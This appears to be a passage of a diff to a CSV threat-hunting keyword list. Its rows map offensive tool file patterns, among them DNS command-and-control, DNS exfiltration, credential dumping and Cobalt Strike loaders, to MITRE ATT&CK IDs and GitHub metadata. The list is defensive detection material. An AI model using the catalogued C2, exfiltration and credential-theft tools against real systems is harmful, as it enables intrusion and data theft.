T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dnscan.git*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*/dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/dnscan.git*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/dnscat.c*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*/dnscat2.git*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*/dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dnscnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/dnscnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" "*/dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-ip6-arpa-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3374,17 +3383,17 @@ "*/dnsspoof.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnsteal*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" -"*/dnstool.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/dnstool.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*/dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dobin/avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/dobin/avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/DocPlz.git*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/documentation-c2/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/documentation-payload/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/DocPlz.git*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/documentation-c2/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/documentation-payload/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/Doge-Loader/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/DoHC2.git*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" @@ -3393,23 +3402,23 @@ "*/domain_analyzer.git*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domain_analyzer:latest*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domainhunter*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"*/DomainRecon/*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/DomainRecon/*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Dome.git*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*/Dome.git*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*/domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dompdf-rce*","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","2","170","69","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z" -"*/DonPAPI.git*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*/DonPAPI.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*/donut *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/donut.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DonPAPI.git*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/DonPAPI.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/donut *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/donut.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*/Donut_Linux*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*/Donut_Windows*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*/DonutCS/Donut.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*/donutmodule.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/DonutTest/*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/DotNet/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/donutmodule.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DonutTest/*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/DotNet/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing 